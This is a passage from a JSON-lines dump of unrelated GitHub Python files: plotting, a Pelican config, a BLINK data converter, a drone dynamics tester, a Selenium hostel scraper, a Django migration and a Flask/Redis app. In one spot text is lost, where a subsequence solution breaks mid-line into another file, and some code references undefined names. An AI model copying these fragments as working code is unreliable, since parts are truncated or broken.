= INPcube.data\n INPdata[np.isinf(INPdata)] = np.nan\n INPcube_longMEAN = INPcube.collapsed('longitude', iris.analysis.MEAN)\n INPdata_longMEAN = INPcube_longMEAN.data\n \n alt = INPcube.coord('altitude').points\n lat = INPcube.coord('latitude').points\n\n TEMPcube = iris.load_cube(SpringTEMP_file[i])\n TEMPdata = TEMPcube.data\n TEMPcube_lonmean = TEMPcube.collapsed('longitude', iris.analysis.MEAN) # TEMPcube_lonmean is 2D [altitude, latitude]\n TEMPdata_lonmean = TEMPcube_lonmean.data\n \n SPRINGdatafield += INPdata_longMEAN\n TEMPdatafield += TEMPdata_lonmean\n counter += 1\n \nSPRINGdatafield /= counter\nTEMPdatafield /= counter\n\nx1, y1 = np.meshgrid(lat, alt)\n \nfig = plt.figure(figsize = (10, 10))\n\nfig.suptitle('Mean INP Concentration over Longitude - Spring', fontsize = 14, y = 0.92)\nax = fig.add_subplot(1, 1, 1)\nax.set_xlabel('Latitude ($^\\circ$ N)', fontsize = 13)\nax.set_ylabel('Altitude (m asl)', fontsize = 13)\n\ncs = ax.contourf(x1[:, :], y1[:, :], SPRINGdatafield[:, :], levels = ccont_levels, cmap = cmap, norm = norm, alpha = 0.9)\nplt.colorbar(cs, orientation = 'horizontal', ticks = cbar_ticks, label = '# / L', pad = 0.1, shrink = 0.9)\nplt.grid(axis='both', alpha = 0.5)\npylab.xlim([30,90])\n\ncsTEMP = limitcontour(ax, x1[:, :], y1[:, :], TEMPdatafield[:, :], \nccont_levels_temp, xlim = [30, 90], ylim = [0, 12000])\n\nfig.savefig('SpringINPcross_density' + '.png')\nplt.show()\n","repo_name":"tuttonluke/MSci_Project","sub_path":"INPcross_section_densitiy_plots.py","file_name":"INPcross_section_densitiy_plots.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8904648577","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u\"L'\\xe9quipe Le.Taxi\"\nSITENAME = 'Le Taxi'\nSITEURL = ''\n\nPATH = 'content'\n\nTIMEZONE = 'Europe/Paris'\n\nDEFAULT_LANG = 'fr'\n\nDEFAULT_DATE_FORMAT = '%a %d %B %Y'\n\nLOCALE = 'fr_FR.UTF8'\n\nDISPLAY_PAGES_ON_MENU = True\n\nDISPLAY_CATEGORIES_ON_MENU = True\n\nTHEME = 'themes/taxitheme';\nPLUGIN_PATHS = [THEME + \"/plugins\"]\nPLUGINS = ['assets','who']\n\nSTATIC_PATHS = ['images', 'extra', 'files']\n\nEXTRA_PATH_METADATA = {\n 'extra/robots.txt': {'path': 'robots.txt'},\n 'extra/apple-touch-icon-precomposed.png': {'path': 'apple-touch-icon-precomposed.png'},\n 'extra/apple-touch-icon.png': {'path': 'apple-touch-icon.png'},\n 'extra/apple-touch-icon-57x57.png': {'path': 'apple-touch-icon-57x57.png'},\n 'extra/apple-touch-icon-60x60.png': {'path': 'apple-touch-icon-60x60.png'},\n 'extra/apple-touch-icon-72x72.png': {'path': 'apple-touch-icon-72x72.png'},\n 'extra/apple-touch-icon-76x76.png': {'path': 'apple-touch-icon-76x76.png'},\n 'extra/apple-touch-icon-114x114.png': {'path': 'apple-touch-icon-114x114.png'},\n 'extra/apple-touch-icon-120x120.png': {'path': 'apple-touch-icon-120x120.png'},\n 'extra/apple-touch-icon-144x144.png': {'path': 'apple-touch-icon-144x144.png'},\n 'extra/apple-touch-icon-152x152.png': {'path': 'apple-touch-icon-152x152.png'},\n 'extra/apple-touch-icon-180x180.png': {'path': 'apple-touch-icon-180x180.png'},\n 'extra/favicon.ico': {'path': 'favicon.ico'},\n 'extra/favicon-16x16.png': {'path': 'favicon-16x16.png'},\n 'extra/favicon-32x32.png': {'path': 'favicon-32x32.png'},\n 'extra/favicon-194x194.png': {'path': 'favicon-194x194.png'},\n 'extra/favicon-96x96.png': {'path': 'favicon-96x96.png'},\n 'extra/browserconfig.xml': {'path': 'browserconfig.xml'},\n 'extra/mstile-144x144.png': {'path': 'mstile-144x144.png'},\n 'extra/mstile-150x150.png': {'path': 'mstile-150x150.png'},\n 'extra/mstile-310x150.png': {'path': 'mstile-310x150.png'},\n 'extra/mstile-310x310.png': {'path': 'mstile-310x310.png'},\n 'extra/mstile-70x70.png': {'path': 'mstile-70x70.png'},\n 'extra/manifest.json': {'path': 'manifest.json'},\n 'extra/android-chrome-144x144.png': {'path': 'android-chrome-144x144.png'},\n 'extra/android-chrome-36x36.png': {'path': 'android-chrome-36x36.png'},\n 'extra/android-chrome-48x48.png': {'path': 'android-chrome-48x48.png'},\n 'extra/android-chrome-72x72.png': {'path': 'android-chrome-72x72.png'},\n 'extra/android-chrome-96x96.png': {'path': 'android-chrome-96x96.png'},\n 'extra/android-chrome-192x192.png': {'path': 'android-chrome-192x192.png'},\n 'extra/manifest.json': {'path': 'manifest.json'},\n 'extra/safari-pinned-tab.svg': {'path': 'safari-pinned-tab.svg'}\n }\n\nPAGE_PATHS = ['']\n\nARTICLE_PATHS = ['news', 'openlab']\n\n# put articles (posts) in news/\nARTICLE_URL = 'news/{slug}.html'\nARTICLE_SAVE_AS = 'news/{slug}.html'\n# we need to change the main index page now though...\nINDEX_SAVE_AS = 'news/index.html'\nINDEX_URL = 'news/'\n#now move all the category and tag stuff to that news/ dir as well\nCATEGORY_URL = 'news/category/{slug}.html'\nCATEGORY_SAVE_AS = 'news/category/{slug}.html'\nCATEGORIES_URL = 'news/category/'\nCATEGORIES_SAVE_AS = 'news/category/index.html'\nTAG_URL = 'news/tag/{slug}.html'\nTAG_SAVE_AS = 'news/tag/{slug}.html'\nTAGS_URL = 'news/tag/'\nTAGS_SAVE_AS = 'news/tag/index.html'\nARCHIVES_SAVE_AS = 'news/archives/archives.html'\nARCHIVES_URL = 'news/archives/archives.html'\nAUTHOR_SAVE_AS = 'news/{slug}.html'\nAUTHORS_SAVE_AS = 'news/authors.html'\n# put pages in the root directory\nPAGE_SAVE_AS = '{slug}.html'\nPAGE_URL = '{slug}.html'\n\n\nDIRECT_TEMPLATES = ['index', 'categories', 'authors', 'archives']\nPAGINATED_DIRECT_TEMPLATES = ['index']\n\nSUMMARY_MAX_LENGTH = 50\n\nWITH_FUTURE_DATES = True\n\nSLUGIFY_SOURCE = 'basename'\n\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n\nDEFAULT_METADATA = {}\n\nPIWIK_URL = 'stats.data.gouv.fr'\nPIWIK_SITE_ID = '18'\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = False\n\n\nOUTPUT_PATH = 'output/'\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n","repo_name":"l-vincent-l/le.taxi","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"384216148","text":"import imageio\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\n# from python_traversability.load_segment_and_filter \nimport load_and_segment\nfrom python_traversability.grid_cloud import grid_cloud\nfrom python_traversability.vis import show_labeled_cloud\nfrom python_traversability.compute_traversability import compute_traversability\nimport matplotlib.pyplot as plt\nfrom python_traversability.config import (\n DEM_FILE,\n HAG_THRESHOLD,\n INPUT_FILE,\n RESOLUTION,\n FILTER_TYPE,\n VIS,\n OUTPUT_FILE,\n)\n\nex = Experiment(\"traversability\")\nex.observers.append(MongoObserver(url=\"localhost:27017\", db_name=\"mmseg\"))\n\n\n@ex.config\ndef config():\n input_file = INPUT_FILE # The file of xyz points\n DEM_file = DEM_FILE # Where to save the intermediate DEM file\n resolution = RESOLUTION # DEM/grid resolution\n HAG_threshold = HAG_THRESHOLD # height above ground threshold\n filter_type = FILTER_TYPE # The filter for computing the ground\n vis = VIS # whether to visualize\n output_file = OUTPUT_FILE\n\n\n@ex.automain\ndef main(\n input_file, DEM_file, resolution, HAG_threshold, filter_type, output_file, vis\n):\n # These results are currently unused, instead we read from the DEM which is written in this step\n xyz, is_ground = load_segment_and_filter(\n input_file,\n dem_resolution=resolution,\n dem_file=DEM_file,\n HAG_limit=HAG_threshold,\n filter_type=filter_type,\n vis=vis,\n )\n traversability = compute_traversability(DEM_file, resolution=resolution, vis=vis)\n imageio.imwrite(output_file, traversability)\n","repo_name":"nefario7/planning-parking","sub_path":"traversability/python_traversability/traversability.py","file_name":"traversability.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2562634638","text":"#User function Template for python3\n#User function Template for python3\n\nimport copy\n\nclass Solution:\n\n def longestSubseq(self,H,N):\n\n dp=[0]*N\n\n size=0\n\n for x in H:\n\n i,j=0,size\n\n while i!=j:\n\n m=(i+j)//2\n\n if dp[m] Dict:\n event2desc = {}\n\n logging.info(f\"loading events from {file_path}\")\n df = pd.read_csv(file_path, sep=\"\\t\", quoting=csv.QUOTE_NONE)\n for _, row in tqdm(df.iterrows()):\n if row[\"Wikidata Item\"] not in event2desc:\n event2desc[row[\"Wikidata Item\"]] = {}\n event2desc[row[\"Wikidata Item\"]][row[\"Wikipedia Language\"]] = {\n \"title\": row[\"Wikipedia Title\"],\n \"description\": row[\"Wikipedia Description\"],\n }\n logging.info(f\"found descriptions for {len(event2desc)} events\")\n return event2desc\n\n\ndef write_blink_jsonl(tsv_path: Path, out_path: Path, event2desc: Dict, use_en_label: bool = False):\n\n data_instances = []\n logging.info(f\"loading data from {tsv_path}\")\n with open(tsv_path, \"r\") as rf:\n header = rf.readline()\n for line in tqdm(rf):\n columns = line.strip().split(\"\\t\")\n wikidata_item, wikipedia_lang, wikipedia_title, wikipedia_inlink_title, context = columns\n\n context_left, mention, context_right = re.match(r\"(.*) (.*) (.*)\", context).groups()\n\n label_lang = \"en\" if use_en_label else wikipedia_lang\n label_title = event2desc[wikidata_item][label_lang][\"title\"]\n label_desc = event2desc[wikidata_item][label_lang][\"description\"]\n\n data_instances += [\n {\n \"context_left\": context_left,\n \"context_right\": context_right,\n \"mention\": mention,\n \"context_lang\": wikipedia_lang,\n \"label_description\": label_desc,\n \"label_id\": wikidata_item.strip(\"Q\"),\n \"label_title\": label_title,\n }\n ]\n\n # shuffle instances to facilitate use of in-batch negatives in BLINK bi-encoder training\n random.shuffle(data_instances)\n\n logging.info(f\"writing data in blink format to {out_path}\")\n with open(out_path, \"w\") as wf:\n for _instance in data_instances:\n wf.write(json.dumps(_instance, ensure_ascii=False) + \"\\n\")\n\n\ndef write_label_dict_jsonl(event2desc: Dict, out_path: Path, use_en_label: bool = False):\n\n data_instances = []\n\n for _item in event2desc:\n for lg in event2desc[_item]:\n if use_en_label and lg != \"en\":\n continue\n data_instances += [\n {\n \"label_id\": _item.strip(\"Q\"),\n \"label_title\": event2desc[_item][lg][\"title\"],\n \"label_desc\": event2desc[_item][lg][\"description\"],\n \"label_lang\": lg,\n }\n ]\n\n # shuffle instances to facilitate use of in-batch negatives in BLINK bi-encoder training\n random.shuffle(data_instances)\n\n logging.info(f\"writing event dictionary to {out_path}\")\n with open(out_path, \"w\") as wf:\n for _instance in data_instances:\n wf.write(json.dumps(_instance, ensure_ascii=False) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(\n format=\"%(asctime)s - %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=logging.INFO,\n handlers=[logging.StreamHandler()],\n )\n\n parser = argparse.ArgumentParser(description=\"convert dataset into BLINK format\")\n parser.add_argument(\"tsv_dir\", type=Path, help=\"dataset tsv\")\n parser.add_argument(\"label_tsv\", type=Path, help=\"label description tsv\")\n parser.add_argument(\"out_dir\", type=Path, help=\"output directory\")\n parser.add_argument(\"--en-label\", action=\"store_true\", help=\"use English description for labels\")\n\n args = parser.parse_args()\n\n args.out_dir.mkdir(exist_ok=True, parents=True)\n\n event2desc = load_events(args.label_tsv)\n\n write_blink_jsonl(\n args.tsv_dir / \"train.tsv\", args.out_dir / \"train.jsonl\", event2desc, use_en_label=args.en_label\n )\n write_blink_jsonl(\n args.tsv_dir / \"dev.tsv\", args.out_dir / \"dev.jsonl\", event2desc, use_en_label=args.en_label\n )\n write_blink_jsonl(\n args.tsv_dir / \"test.tsv\", args.out_dir / \"test.jsonl\", event2desc, use_en_label=args.en_label\n )\n\n write_label_dict_jsonl(event2desc, args.out_dir / \"label_dict.jsonl\", use_en_label=args.en_label)\n","repo_name":"adithya7/xlel-wd","sub_path":"data_collection/wikipedia/convert_to_blink.py","file_name":"convert_to_blink.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6230664667","text":"from mppi.MPPI_Node import get_mppi_config\nfrom mppi.dynamics_models import AnalyticalModel, SampleLearnedModel\nfrom matplotlib import pyplot as plt\n\nimport numpy as np\n\nclass TestDynamics():\n \"\"\"Class for testing performance of dynamics models\"\"\"\n\n def __init__(self, model, test_states, title):\n #Dynamics model object, to be tested\n self.model = model\n self.model2 = model2\n #Data from a single drone\n self.data = test_states\n _ , self.n = np.shape(test_states)\n self.dt = 1/48\n self.lin_accels = (self.data[3:6, 1:] - self.data[3:6, :-1])/self.dt\n self.ang_accels = (self.data[9:12, 1:] - self.data[9:12, :-1])/self.dt\n self.title = title\n\n def runModelStep(self, printout = False): \n \"\"\"COMPARE STEP BY STEP PREDICTIONS\"\"\"\n #preallocate prediction\n self.s_pred = np.zeros((12, self.n-1))\n #Simulate model for each time step\n for i in range(1, self.n):\n s_in = self.data[:12, i-1] #previous state \n u_in = self.data[12:, i] #control action taken \n s_out = self.data[:12, i]\n #Call model to get prediction\n self.s_pred[:, i-1] = self.model2(s_in.reshape(1, -1), u_in.reshape(1, -1)).flatten()\n\n #Printing for debugging \n if printout: \n print(\"\\n\\n\\n\\n\\n\")\n print(\"In\")\n print(s_in)\n print(u_in)\n print(\"Actual\")\n print(s_out)\n print(\"Prediction\")\n print(self.s_pred[:, i-1])\n print(\"---------\")\n\n def trajPrediction(self, rollout = True):\n \"\"\"COMPARE ROLLOUT OF TRAJECTORIES TO LOOK FOR COMPOUDNING ERROR\"\"\"\n self.rollout = np.zeros((12, self.n))\n\n self.rolled_accelerations = np.zeros((6, self.n-1))\n self.rollout[:, 0] = self.data[:12, 0]\n #rollout trajectory\n for i in range(1, self.n):\n if rollout:\n s_in = self.rollout[:12, i-1] #previous predicted state\n else:\n s_in = self.data[:12, i-1]\n\n u_in = self.data[12:, i] #requested control\n self.rollout[:, i] = self.model(s_in.reshape(1, -1), u_in.reshape(1, -1))\n self.rolled_accelerations[:, i-1] = self.model.accelerationLabels(s_in.reshape(1, -1), u_in.reshape(1, -1))\n\n\n def compareTraj(self):\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.data[0, :], label = 'X Actual')\n axs[0].plot(self.rollout[0, :], '--', label = 'X Predicted')\n axs[0].legend()\n\n axs[1].plot(self.data[1, :], label = 'Y Actual')\n axs[1].plot(self.rollout[1, :], '--', label = 'Y Predicted')\n axs[1].legend()\n\n \n axs[2].plot(self.data[2, :], label = 'Z Actual')\n axs[2].plot(self.rollout[2, :], '--', label = 'Z Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.data[3, :], label = 'V_x Actual')\n axs[0].plot(self.rollout[3, :], '--', label = 'V_x Predicted')\n axs[0].legend()\n\n axs[1].plot(self.data[4, :], label = 'V_y Actual')\n axs[1].plot(self.rollout[4, :], '--', label = 'V_y Predicted')\n axs[1].legend()\n\n axs[2].plot(self.data[5, :], label = 'V_z Actual')\n axs[2].plot(self.rollout[5, :], '--', label = 'V_z Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.data[6, :], label = 'Roll Actual')\n axs[0].plot(self.rollout[6, :], '--', label = 'Roll Predicted')\n axs[0].legend()\n\n axs[1].plot(self.data[7, :], label = 'Pitch Actual')\n axs[1].plot(self.rollout[7, :], '--', label = 'Pitch Predicted')\n axs[1].legend()\n\n axs[2].plot(self.data[8, :], label = 'Yaw Actual')\n axs[2].plot(self.rollout[8, :], '--', label = 'Yaw Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.data[9, :], label = 'Roll Rate Actual')\n axs[0].plot(self.rollout[9, :], '--', label = 'Roll Rate Predicted')\n axs[0].legend()\n\n axs[1].plot(self.data[10, :], label = 'Pitch Rate Actual')\n axs[1].plot(self.rollout[10, :], '--', label = 'Pitch Rate Predicted')\n axs[1].legend()\n\n axs[2].plot(self.data[11, :], label = 'Yaw Rate Actual')\n axs[2].plot(self.rollout[11, :], '--', label = 'Yaw Rate Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n plt.show()\n \n def compare_accels(self):\n \"\"\"Method For Comparing Acceleration Rollouts\"\"\"\n\n\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.lin_accels[0, :], label = 'X Accel Actual')\n axs[0].plot(self.rolled_accelerations[0, :], '--', label = 'X Accel Predicted')\n axs[0].legend()\n\n axs[1].plot(self.lin_accels[1, :], label = 'Y Accel Actual')\n axs[1].plot(self.rolled_accelerations[1, :], '--', label = 'Y Accel Predicted')\n axs[1].legend()\n\n \n axs[2].plot(self.lin_accels[2, :], label = 'Z Accel Actual')\n axs[2].plot(self.rolled_accelerations[2, :], '--', label = 'Z Accel Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n\n fig, axs = plt.subplots(3, 1)\n axs[0].plot(self.ang_accels[0, :], label = 'Roll Accel Actual')\n axs[0].plot(self.rolled_accelerations[3, :], '--', label = 'Roll Accel Predicted')\n axs[0].legend()\n\n axs[1].plot(self.ang_accels[1, :], label = ' Pitch Accel Actual')\n axs[1].plot(self.rolled_accelerations[4, :], '--', label = 'Pitch Accel Predicted')\n axs[1].legend()\n\n \n axs[2].plot(self.ang_accels[2, :], label = 'Yaw Accel Actual')\n axs[2].plot(self.rolled_accelerations[5, :], '--', label = 'Yaw Accel Predicted')\n axs[2].legend()\n plt.suptitle(self.title)\n\n plt.show()\n\n \"\"\"VARIOUS ERROR METRICS TO PLOT AND VISUALIZE ACCURACY\"\"\"\n def linear_absolute_error(self):\n #Plot the absolute error for linear cases\n x_error = np.abs(self.data[0, 1:-1] - self.s_pred[0, :-1])\n y_error = np.abs(self.data[1, 1:-1] - self.s_pred[1, :-1])\n z_error = np.abs(self.data[2, 1:-1] - self.s_pred[2, :-1])\n\n vx_error = np.abs(self.data[3, 1:-1] - self.s_pred[3, :-1])\n vy_error = np.abs(self.data[4, 1:-1] - self.s_pred[4, :-1])\n vz_error = np.abs(self.data[5, 1:-1] - self.s_pred[5, :-1])\n\n plt.figure(1)\n plt.plot(x_error, label = \"X\")\n plt.plot(y_error, label = \"Y\")\n plt.plot(z_error, label = \"Z\")\n plt.title(\"Position Error\")\n plt.xlabel(\"Time Step\")\n plt.ylabel(\"Absolute Difference [m]\")\n plt.legend()\n\n plt.figure(2)\n plt.plot(vx_error, label = \"v_x\")\n plt.plot(vy_error, label = \"v_y\")\n plt.plot(vz_error, label = \"v_z\")\n plt.title(\"Velocity Error\")\n plt.xlabel(\"Time Step\")\n plt.ylabel(\"Absolute Difference [m/s]\")\n plt.legend()\n plt.show()\n\n def rotational_absolute_error(self):\n ##plot absolute error for rotational cases \n r_error = np.abs(np.unwrap(self.data[6, 1:-1], period = 2*np.pi) - np.unwrap(self.s_pred[6, :-1], period = 2*np.pi))\n p_error = np.abs(np.unwrap(self.data[7, 1:-1], period = 2*np.pi) - np.unwrap(self.s_pred[7, :-1], period = 2*np.pi))\n y_error = np.abs(np.unwrap(self.data[8, 1:-1], period = 2*np.pi) - np.unwrap(self.s_pred[8, :-1], period = 2*np.pi))\n\n rr_error = np.abs(self.data[9, 1:-1] - self.s_pred[9, :-1])\n pr_error = np.abs(self.data[10, 1:-1] - self.s_pred[10, :-1])\n yr_error = np.abs(self.data[11, 1:-1] - self.s_pred[11, :-1])\n\n plt.figure(3)\n plt.plot(r_error, label = \"Roll\")\n plt.plot(p_error, label = \"Pitch\")\n plt.plot(y_error, label = \"Yaw\")\n plt.title(\"Orientation Error\")\n plt.xlabel(\"Time Step\")\n plt.ylabel(\"Absolute Difference [rad]\")\n plt.legend()\n \n plt.figure(4)\n plt.plot(rr_error, label = \"Roll Rate\")\n plt.plot(pr_error, label = \"Pitch Rate\")\n plt.plot(yr_error, label = \"Yaw Rate\")\n plt.title(\"Angular Velocity Error\")\n plt.xlabel(\"Time Step\")\n plt.ylabel(\"Absolute Difference [rad/s]\")\n plt.legend()\n plt.show()\n\n\n# TEST ANALYTICAL DYNAMICS MODEL\n# Create config\nconfig = get_mppi_config()\n\n#Create dyanmics model object\ntestAnalytical = AnalyticalModel(config) \n#flight_file = \"./bootstrap/datasets/dyn/AGGRO_000/sim_data/save-flight-04.19.2023_21.30.37.npy\"\nflight_file = \"PYBD2.npy\"\n#flight_file = \"test_data_dyn2.npy\"\ntest_data = np.load(flight_file)\ntest_state = test_data['states'][0]\n\n\"\"\"TEST FOR PYB DATA (EXPLICIT = FALSE)\"\"\"\n\ntestAnalyticalPYB = AnalyticalModel(config, explicit=False) \nAnalyticalTester = TestDynamics(testAnalyticalPYB, test_state[:, :], \"Analytical Model PYB\")\nAnalyticalTester.runModelStep(printout=False)\n\n# AnalyticalTester.linear_absolute_error()\n# AnalyticalTester.rotational_absolute_error()\n\nAnalyticalTester.trajPrediction() #WITH ROLLOUT \n#AnalyticalTester.trajPrediction(rollout = False) #WITHOUT ROLLOUT\nAnalyticalTester.compareTraj()\nAnalyticalTester.compare_accels()\n\n\nprint(\"end\")\n\n","repo_name":"andrew-garrett/quad_rl","sub_path":"testDynamics.py","file_name":"testDynamics.py","file_ext":"py","file_size_in_byte":9360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4796865167","text":"# Problem Statement:\n# To check whether input number is Armstrong number or not. An Armstrong number is an\n# integer with three digits such that the sum of the cubes of its digits is equal to the number\n# itself. Ex. 371.\n\nnumber = int(input('Enter a number: '))\n\nnum_copy = number\n\nsum_of_cubes = 0\n\nwhile num_copy > 0:\n rem = num_copy % 10\n rem_cube = rem * rem * rem\n sum_of_cubes += rem_cube\n num_copy = int(num_copy / 10)\n\nif sum_of_cubes == number:\n print(number, 'is an Armstrong No.')\nelse:\n print(number, 'is not an Armstrong No.')","repo_name":"assignments-help/SPPU-FE-2019-Pattern","sub_path":"Programming and Problem Solving Laboratory/Assignment-05/Assi-05.py","file_name":"Assi-05.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"28921040714","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom collections import defaultdict\nimport pandas as pd\nimport csv\nimport sys\nimport pickle\n\nDetails = defaultdict(list)\n\nPATH = \"/home/srinidhi/chromedriver\"\n\nDetails = defaultdict(list)\n\nclass TextScrapper:\n def __init__(self,url):\n self.browser1 = webdriver.Chrome(executable_path = PATH)\n self.browser1.get(url)\n\n def details(self):\n name = self.browser1.find_element_by_xpath('//*[@class=\"residenceDetailMainSection__ResidenceTitle-zp1koj-1 pSmdV\"]').text\n des = self.browser1.find_element_by_xpath('//*[@class=\"aboutResidenceDetail__AboutDetail-sc-1xseatz-1 eNRyMY\"]').text\n loc = des.split(\",\")[0]\n action = self.browser1.find_elements_by_xpath('//*[@class=\"residenceIncludeSection__TabContainer-sc-1gv6zsp-2 heDQoy\"]/div')\n roomfeaturelist = defaultdict(list)\n for z in action:\n #Click on Room amenities like Room features .....\n st = z.click()\n z = z.text\n roomfeature = self.browser1.find_elements_by_xpath('//*[@class=\"residenceIncludeSection__GridTitle-sc-1gv6zsp-6 kRSgJn\"]')\n for y in roomfeature:\n #Room amenities dictionary\n roomfeaturelist[z].append(y.text)\n gender = self.browser1.find_element_by_xpath(\"//p[contains(@class,'residenceDetailMainSection__ResidenceAdd-zp1koj-2')]\").text\n gender = gender.split(\"|\")\n location = loc + \",\" + gender[0]\n roomtype = self.browser1.find_elements_by_xpath('//*[@class=\"residenceDetailOccupancy__OccTitle-vtazqv-8 cFNLZE\"]')\n roomprice = self.browser1.find_elements_by_xpath('//*[@class=\"residenceDetailOccupancy__OccPrice-vtazqv-9 halzNF\"]')\n length1 = len(roomtype)\n x = 0\n y = 0\n roomdetailslist = []\n while x < length1:\n con1 = roomtype[x].text\n con2 = roomprice[y].text\n con3 = roomprice[y+1].text\n con2 = con2.encode('utf-8').replace(\"₹\",\"Rs.\")\n con = con1 + \" \" + str(con2) + con3\n roomdetailslist.append(con)\n y = y + 2\n x = x + 1\n image = self.browser1.find_elements_by_xpath('//li[@class=\"residenceDetailMainSection__CarousalImgLI-zp1koj-8 eUkiOg\"]/img')\n imglist = []\n for y in image:\n images = y.get_attribute('src')\n #image link list\n imglist.append(images)\n #print (imglist)\n #Write on CSV file\n Details['Name'].append(name)\n Details['Gender'].append(gender[1])\n Details['Address'].append(location)\n Details['RoomType_Rent'].append(roomdetailslist)\n Details['Overview'].append(des)\n Details['Amenities'].append(roomfeaturelist)\n Details['Images'].append(imglist)\n print(name,gender[1],location,des,roomfeaturelist,roomdetailslist,imglist)\n\n def close(self):\n self.browser1.close()\n\ndbfile = open('city_links','rb')\nwhile 1:\n try:\n City_Links = pickle.load(dbfile)\n except EOFError:\n break\ndbfile.close()\ncity_name = sys.argv[1]\nif city_name in City_Links.keys():\n print(\"Number of available links for {} is \".format(city_name) + str(len(City_Links[city_name])))\n links = City_Links[city_name]\n Low_site = int(input(\"Enter the lower link id\"))\n High_site = int(input(\"Enter the higher link id\"))\n print(Low_site)\n print(High_site)\n if Low_site > 0 and High_site <= len(links):\n for lk in range(Low_site-1,High_site):\n Details[\"Id\"].append(lk+1)\n obj = TextScrapper(links[lk])\n obj.details()\n obj.close()\n columns = ['Id','Name','Address','Gender','RoomType_Rent','Overview','Amenities','Images']\n df = pd.DataFrame(Details,columns = columns)\n filename = \"%s.csv\"%city_name\n df.to_csv(filename,mode = 'a',header = False,columns = columns,encoding = 'utf-8')\n else:\n print(\"Wrong Range\")\nelse:\n print(\"{}'s links is not crawled please collect the links\".format(city_name))\n","repo_name":"kss682/freelancer","sub_path":"stanzaliving/web_crawler.py","file_name":"web_crawler.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22302747717","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('corporation', '0010_auto_20150920_1113'),\n ]\n\n operations = [\n migrations.RunSQL(\n sql = '''\n ALTER TABLE corporation_asset DROP COLUMN search_tokens;\n ALTER TABLE corporation_asset ADD COLUMN search_tokens TSVECTOR;\n CREATE INDEX corporation_asset_search_tokens_xczvn43562asd ON corporation_asset USING gin(search_tokens);\n COMMIT;\n '''\n ),\n ]\n","repo_name":"kriberg/stationspinner","sub_path":"stationspinner/corporation/migrations/0011_auto_20150920_1132.py","file_name":"0011_auto_20150920_1132.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"15135890840","text":"import pandas as pd\nimport copy\n\ndef combine(data, attrs):\n\t#create a list, to store and sort the combination\n\ttmpList = []\n\n\tdata = data.sort_index(axis=0)\n\n\t#finds the combination for each D sub i\n\tfor i in range(data.shape[0]):\n\t\taverage = 0.0\n\n\t\tfor N in attrs:\n\t\t\taverage += data.iloc[i, N]\n\t\taverage = average/len(attrs) # do not explicitly need to divide, beacuse it is a comparison\n\n\t\t\n\t\ttmpList.append(average)\n\n\tdata = data.assign(f=tmpList).sort_values('f', ascending=False, kind='mergesort').drop('f',axis=1)\n\n\treturn data\n\n\ndef accList(data, precisionAt):\n\ttruthList =data.iloc[:, -1].tolist()\n\n\tresult = []\n\n\tfor precision in precisionAt:\n\t\taccuracy = 0.0\n\t\tfor i in range(precision):\n\t\t\taccuracy+=truthList[i]\n\n\t\tresult.append(round((accuracy/precision)*100,1))\n\n\treturn result\n\ndef accuracy(data, attrs, precisionAt):\n\tdataCP = copy.deepcopy(data)\n\tdataSet = combine(dataCP, attrs)\n\tresult = accList(dataSet, precisionAt)\n\n\treturn result\n","repo_name":"icgranger9/BigDataAnalytics","sub_path":"GrangerPovlitz_Combination.py","file_name":"GrangerPovlitz_Combination.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25356906302","text":"from flask import Flask\r\nimport redis\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef hello_name():\r\n r = redis.Redis(host=\"redis\", port=6379, db=0)\r\n name = r.get(\"name\").decode()\r\n return \"Hello {}\\n\".format(name)\r\n\r\n\r\nif __name__ == 